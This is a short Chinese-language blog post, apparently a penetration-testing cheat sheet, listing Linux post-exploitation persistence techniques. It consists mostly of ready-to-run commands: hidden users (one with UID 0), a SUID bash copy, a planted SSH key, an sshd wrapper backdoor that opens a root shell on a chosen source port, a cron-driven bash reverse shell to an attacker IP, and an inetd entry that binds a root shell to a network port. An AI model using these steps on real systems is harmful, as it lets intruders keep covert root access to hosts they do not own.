Linux 後門權限持

 Linux 後門權限持


作者 : Noth

前言 : 
滲透拿到主機權限並提權成功後,接下來就是要進行維持權限 xD  可以方便進入系統中,在進一步進行橫向擴散。

內文 : 

1.  一句話添加用戶/密碼 : 

添加普通用戶 :
用户名 : guest,密碼 : 1qaz@WSX
useradd -p `openssl passwd -1 -salt 'salt' 1qaz@WSX` guest

切換帳戶
su guest

useradd -p 方法("$()"也可以存放命令執行語句) :  
添加普通用戶 :
useradd -p "$(openssl passwd -1 123456)" noth
切換帳戶 :
su noth

chpasswd 方法 : 
添加普通用戶 :
useradd guest;echo 'noth$:123456'|chpasswd
切換帳戶 :
su noth$

echo -e 方法 : 
添加普通用戶 :
useradd test;echo -e "123456\n123456\n" |passwd test
切換帳戶 :
su test

添加 root用户 :
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
切換帳戶 : 
su guest

2. SUID Shell
root 用戶 : 
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell
普通用戶 : 
/tmp/shell -p

3. ssh 公私鑰免密登入 
https://segmentfault.com/a/1190000024575872
在 attack 上生成一對公私鑰,然後把公鑰放到 victim 上 (~/.ssh/authorized_keys),attack 保留私鑰,當 ssh 登入時,ssh 程序會發送私鑰去和服務器上的公鑰做匹配,如果匹配成功就可以登入了。

前提 :
victim 有開 22 port , 知道一般 user 或 root 帳戶的密碼

實作環境 : 
attack :  192.168.179.144 , kali
victim :  192.168.179.146 , ubuntu

attack 生成公私鑰 : 
ssh-keygen -t rsa

將 attack's id_rsa.pub 傳到 victim's /root/.ssh/authorized_keys : 
ssh-copy-id -i ~/.ssh/id_rsa.pub ubuntu@192.168.179.146

ssh 登入主機 : 
ssh ubuntu@192.168.179.146
ssh -p 22 -i ~/.ssh/id_rsa ubuntu@192.168.179.146

4. 軟連接 (待繼續)
https://blog.csdn.net/weixin_40412037/article/details/117447832

5. SSH wrapper
victim : 
cd /usr/sbin/
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart

attack : 
socat STDIO TCP4:192.168.86.185:22,sourceport=13377

6. crontab
設置周期性被執行的指令,新建shell腳本,利用腳本進行反彈
victim : 
在 /tmp 目錄添加 reverse.sh 腳本
#!/bin/bash
bash -i >& /dev/tcp/192.168.86.192/12345 0>&1

授予權限 : 
chmod +sx /tmp/reverse.sh

設置 crontab : 
vim /etc/crontab
*/1 * * * * root /tmp/reverse.sh

重啟 crontab 服務 : 
service cron restart

attack : 
nc -lvvp 12345

6. inetd
https://blog.csdn.net/d_0xff/article/details/51521075 
前提 :
victim 有開啟 telnet/23 Port 服務

環境配置
victim :
先安裝 
apt-get install telnetd

victim : 
修改 /etc/inetd.conf 
添加 daytime stream tcp nowait root /bin/bash bash -i

attack : 
nc -vv 192.168.86.185 13


留言

熱門文章